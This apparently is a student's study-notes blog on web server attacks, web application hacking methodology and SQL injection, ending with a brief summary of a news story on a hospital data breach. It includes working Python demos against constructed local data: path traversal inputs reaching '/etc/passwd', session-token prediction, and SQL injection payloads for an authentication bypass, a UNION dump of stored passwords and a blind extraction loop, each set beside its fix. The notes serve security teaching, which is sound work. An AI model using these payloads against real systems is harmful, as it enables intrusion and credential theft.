Friday, April 17, 2020

Blog 12

This chapter covered web servers, web applications, and SQL injection.

Web Servers

  • A web server is the software (and the host it runs on) that stores web content and serves it to clients over HTTP.
  • Web servers are a large attack surface: misconfiguration, unpatched server software, and the applications hosted on them all introduce vulnerabilities.
  • There are different types of server attacks.
    • Website defacement: The attacker vandalizes the site by replacing or altering its content, usually to show that the server was compromised.
    • Directory traversal: The attacker places "../" sequences (often URL-encoded) in a file path parameter to read files outside the web root, such as configuration or password files.
    • Cross-site scripting (XSS): The site echoes untrusted input into a page without encoding it, so an attacker can plant script that runs in other users' browsers, steals their cookies, or acts on their behalf.
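The directory traversal item above is easiest to understand by looking at the path handling itself. The example below is added here and is not code from the chapter or the blog: it contrasts a naive handler that joins the request path onto a constructed web root (assumed to be /var/www/html) with a hardened one that percent-decodes once, rejects null bytes (the poison null byte described under Web Applications below), anchors the path under the root, and checks after normalisation that it is still inside it. posixpath is used so the result is the same on any operating system.

```python
import posixpath
from urllib.parse import unquote

# Constructed web root for the example (an assumption, not a real deployment);
# posixpath is used so the logic behaves the same on every OS.
WEB_ROOT = "/var/www/html"


def resolve_vulnerable(requested: str) -> str:
    """Naive handler: glue the request path onto the web root and normalise.
    '../' segments walk out of the root, and an absolute path replaces it."""
    return posixpath.normpath(posixpath.join(WEB_ROOT, requested))


def resolve_hardened(requested: str) -> str:
    """Reject null bytes, anchor the path inside the root, and verify after
    normalisation that it is still under WEB_ROOT."""
    if "\x00" in requested:
        raise ValueError("null byte in path")
    # lstrip('/') stops an absolute request path from replacing WEB_ROOT in join()
    candidate = posixpath.normpath(posixpath.join(WEB_ROOT, requested.lstrip("/")))
    # commonpath compares whole components, so /var/www/html-private does not pass
    if posixpath.commonpath([WEB_ROOT, candidate]) != WEB_ROOT:
        raise ValueError("path escapes web root")
    return candidate


def serve(raw_path: str, hardened: bool = True) -> tuple:
    """Percent-decode the request path once, as a server would, then resolve it.
    Returns ('ok', filesystem path) or ('blocked', reason)."""
    decoded = unquote(raw_path)
    resolver = resolve_hardened if hardened else resolve_vulnerable
    try:
        return ("ok", resolver(decoded))
    except ValueError as exc:
        return ("blocked", str(exc))


if __name__ == "__main__":
    for path in ["images/logo.png", "..%2F..%2F..%2Fetc%2Fpasswd",
                 "/etc/passwd", "index.html%00.png", "../html-private/x"]:
        print(f"{path!r:32} naive={serve(path, hardened=False)}  hardened={serve(path)}")
```

On a real filesystem, resolve symlinks with os.path.realpath before the commonpath check, and decode the path exactly once: a server that decodes twice lets "%252e%252e%252f" turn into "../" after the check has already run.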
Web Applications
  • A web application is software that runs on top of a web server and is reached through it.
  • They process, store, and distribute information.
  • Upload bombing: uploading a large number of files (or very large files) to exhaust the server's disk space or crash it.
  • Poison null byte attack: sending a null character (%00) to a script so that a lower layer written in C treats the string as ending there, which bypasses checks such as an appended file extension.
  • Cookies are a vulnerability as well: they carry session tokens and sometimes application state, so they can be stolen, replayed, or tampered with if the server trusts their contents or sets them without the Secure and HttpOnly flags.
  • Web application hacking methodology
    • Start with footprinting the web infrastructure. 
      • Whois lookup
      • DNS interrogation
      • Port Scanning
    • Next scan for vulnerabilities using a vulnerability scanner
    • Begin attacks that target those vulnerabilities, or even launch a DoS or DDoS attack.
    • Analyze web applications
      • Identify entry point for user input.
      • Identify which applications are provided to the client.
    • Attack the authentication mechanism by targeting implementation flaws and error handling in the web application (weak passwords, verbose login errors, insecure password reset).
    • Attack authorization scheme
      • Attackers modify input fields in HTTP requests to reach data or functions they are not authorized for:
      • Query String
      • HTTP header
    • Attack session management mechanisms
      • Session token prediction
      • Session Hijacking
      • Man-in-the-middle attacks 
    • Perform injection attacks
      • Injects malicious input into a field so that it is interpreted as part of a query, command, or script, to modify a database or alter a website.
      • Code injection: the attacker's input is executed as code by the application itself (for example through an eval-style function).
      • Command injection: the attacker's input is passed to an operating system shell, so extra commands run with the web server's privileges.
    • Attack flaws in application logic
    • Attack database connectivity
    • Attack the web client application
  • Penetration Testing Methodology
    • Information gathering about target system or network
      • Active and cached web pages
      • Error Messages
      • Entry points 
      • Web applications
    • Check configuration settings
    • Test application configuration management
      • Use CGI scanners
      • Review web server content, configuration files, and log files.
      • Test for hidden file extensions and check locations of old backup and configuration files.
      • Administrative Interfaces
      • Review HTML and source code. Watch for comments and coding tags.
    • Authentication Testing
      • Password reset
      • Session timeout
      • Browser cache
      • Password error or lockout feature
    • Session Management Testing
      • Cookies
      • Session fixations
      • Exposed session variables
      • Cross-site request forgery (CSRF)
    • Denial-of-service testing
      • Account lockouts
      • Buffer overflows
      • User-specified object allocation
    • Data validation
      • Input vulnerabilities
      • Character type or count
    • Authorization testing
    • Document all findings during the test
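The session token prediction item in the hacking methodology above comes down to how much of a token an attacker can guess. The example below is added here and is not code from the chapter or the blog: it builds a constructed weak token scheme (the issue time in seconds seeds Python's non-cryptographic PRNG, and the user id is appended in clear), shows how an attacker who knows the user id and roughly when the victim logged in enumerates every possible token in a window, and contrasts it with a token drawn from the OS CSPRNG via the secrets module.

```python
import random
import secrets
import time


def weak_token(issue_time: int, user_id: int) -> str:
    """Constructed weak scheme (an assumption for the example): the only secret
    is the second the session was issued, which seeds a Mersenne Twister PRNG;
    the user id is appended in clear. Everything here is guessable."""
    rng = random.Random(issue_time)
    return f"{rng.getrandbits(32):08x}-{user_id}"


def predict_weak_tokens(approx_time: int, user_id: int, window: int = 60) -> list:
    """Attacker view: knowing the victim's user id and roughly when they logged
    in (a Date header, a log line, a 'welcome' email), enumerate every token the
    scheme could have produced within +/- window seconds."""
    return [weak_token(t, user_id)
            for t in range(approx_time - window, approx_time + window + 1)]


def hijack_weak_session(victim_token: str, approx_time: int, user_id: int) -> int:
    """Return how many guesses it takes to hit the victim's token, or -1 if the
    window did not contain it. Compare this with the 2**256 space below."""
    for guess_no, guess in enumerate(predict_weak_tokens(approx_time, user_id), start=1):
        if guess == victim_token:
            return guess_no
    return -1


def strong_token() -> str:
    """Fix: 32 bytes (256 bits) from the OS CSPRNG, with no structure and no
    user data embedded. Nothing observable narrows the search space."""
    return secrets.token_urlsafe(32)


def tokens_are_unique(n: int = 10_000) -> bool:
    """Sanity check on the strong scheme: no collisions across n issuances. A
    collision at this size would indicate a broken RNG, not bad luck."""
    return len({strong_token() for _ in range(n)}) == n


if __name__ == "__main__":
    now = int(time.time())
    victim = weak_token(now, user_id=42)
    print("weak token:", victim)
    print("guesses needed by attacker who is 17 s off:", hijack_weak_session(victim, now + 17, 42))
    print("strong token:", strong_token())
```

Predictability is only half the problem: the server must also compare presented tokens with hmac.compare_digest and expire them, otherwise a token that cannot be guessed can still be brute-forced or replayed indefinitely.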
SQL Injections
  • SQL (Structured Query Language) is the language used to request and modify data in a relational database.
  • SQL injection is an attack on a web application in which input entered on a web page is placed unescaped into a SQL statement, so the attacker can change what the statement does.
  • They target flaws in web applications, not in the database software itself.
  • They exploit input validation vulnerabilities.
  • They use the application's own queries and database privileges rather than introducing new code.
  • SQL Injection Methodology
    • Information Gathering
      • See if web application is connected to a database server
      • Inject codes into fields to generate error messages
    • Test for SQL injection vulnerabilities (single quotes, comment sequences, and boolean conditions in each input).
    • Launch an SQL injection attack
      • In-band: One communication channel is used both to attack and to gather results.
        • Error-based: Depends on database error messages echoed back by the application.
        • Union-based: Uses the UNION operator to combine the results of an injected SELECT with the original query's results in one response.
      • Blind SQL injection: The application returns no data or errors, only something that differs between a true and a false condition.
        • Content-based (boolean-based) blind: Uses a query that makes the HTTP response differ for a true or false answer.
        • Time-based blind: Makes the database delay so the HTTP response time differs for a true or false answer.
      • Advanced SQL injection: Database, table, and column enumeration; password grabbing.
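The SQL injection methodology above (probe for errors, then error-based, union-based and blind extraction) can be walked through end to end against a small database. The example below is added here and is not code from the chapter or the blog: it builds a constructed in-memory SQLite database with a users table and a notes table, a login query and a notes search built by string formatting the way a vulnerable application does them, and the parameterized login that fixes the problem. It then runs the single-quote error probe, the authentication bypass, a UNION ALL dump of every username and password through the notes search, and a boolean-blind loop that recovers a password one character at a time from nothing but "did any rows come back".

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed in-memory database standing in for the application's backend."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT);
        INSERT INTO users (username, password, role) VALUES
            ('alice', 'S3cret!', 'admin'),
            ('bob',   'hunter2', 'user');
        CREATE TABLE notes (id INTEGER PRIMARY KEY, owner TEXT, body TEXT);
        INSERT INTO notes (owner, body) VALUES ('alice', 'q3 plans'), ('bob', 'grocery list');
    """)
    return conn


def login_vulnerable(conn, username: str, password: str) -> list:
    """String-built query: the input becomes part of the SQL statement."""
    sql = (f"SELECT username, role FROM users "
           f"WHERE username = '{username}' AND password = '{password}'")
    return conn.execute(sql).fetchall()


def login_parameterized(conn, username: str, password: str) -> list:
    """Fix: placeholders keep the input as data; the statement text never changes."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


def search_notes_vulnerable(conn, owner: str) -> list:
    """Second string-built query; returns the note bodies for the given owner."""
    sql = f"SELECT body FROM notes WHERE owner = '{owner}'"
    return [row[0] for row in conn.execute(sql).fetchall()]


def probe_for_injection(conn) -> bool:
    """Information-gathering step: a lone quote that causes a database error
    shows the input reaches the SQL statement unescaped (error-based signal)."""
    try:
        login_vulnerable(conn, "'", "")
    except sqlite3.OperationalError:
        return True
    return False


def union_dump_credentials(conn) -> list:
    """Union-based: append a SELECT over another table to the notes query. The
    '--' comment marker discards the closing quote the application appends."""
    payload = "x' UNION ALL SELECT username || ':' || password FROM users --"
    return sorted(search_notes_vulnerable(conn, payload))


def blind_extract_password(conn, username: str, max_len: int = 32) -> str:
    """Boolean-blind: each probe asks one yes/no question (is the character at
    position pos equal to code?) and reads the answer from whether any notes
    come back. Probes printable ASCII and stops at the first position where
    nothing matches, which is what substr() past the end produces."""
    recovered = ""
    for pos in range(1, max_len + 1):
        match = None
        for code in range(32, 127):
            payload = (f"x' OR (SELECT unicode(substr(password,{pos},1)) "
                       f"FROM users WHERE username='{username}')={code} --")
            if search_notes_vulnerable(conn, payload):
                match = chr(code)
                break
        if match is None:
            break
        recovered += match
    return recovered


if __name__ == "__main__":
    db = build_db()
    print("error probe:", probe_for_injection(db))
    print("bypass:", login_vulnerable(db, "alice' --", "wrong"))
    print("parameterized:", login_parameterized(db, "alice' --", "wrong"))
    print("union dump:", union_dump_credentials(db))
    print("blind extraction:", blind_extract_password(db, "alice"))
```

The blind loop needs up to 95 requests per character, which is why real tooling uses a binary search on the character code instead; time-based blind works the same way but reads the answer from a delay (SLEEP() in MySQL, pg_sleep() in PostgreSQL) because SQLite has no sleep function. The parameterized query is the fix in every case: the same payloads return nothing from login_parameterized.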

Article

The article I read was about a security breach at Beaumont Health. 112,000 people's information was leaked nearly a year ago. Details leaked included names, dates of birth, Social Security numbers, medical conditions, bank account information, and driver's licenses. It doesn't say they caught the hacker, but they have implemented better training and education for their employees.


https://www.freep.com/story/news/health/2020/04/17/beaumont-health-security-breach-personal-information/5155716002/